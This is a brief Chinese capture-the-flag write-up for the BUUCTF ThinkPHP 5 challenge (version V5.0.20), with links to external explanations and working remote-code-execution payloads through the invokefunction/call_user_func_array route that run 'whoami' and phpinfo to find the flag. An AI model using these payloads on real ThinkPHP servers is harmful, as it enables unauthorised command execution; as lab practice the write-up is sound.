buuctf [ThinkPHP]5
大佬们都是直接rce
这里漏洞技术细节(涉及代码段、原理等)我上个链接
https://blog.csdn.net/ArrowQin/article/details/105913146
https://bbs.ichunqiu.com/thread-48687-1-1.html?tdsourcetag=s_pcqq_aiomsg
https://blog.csdn.net/shuaicenglou3032/article/details/109002651
解题
版本是ThinkPHP V5.0.20
poc
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
在phpinfo发现flag
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
赞 (0)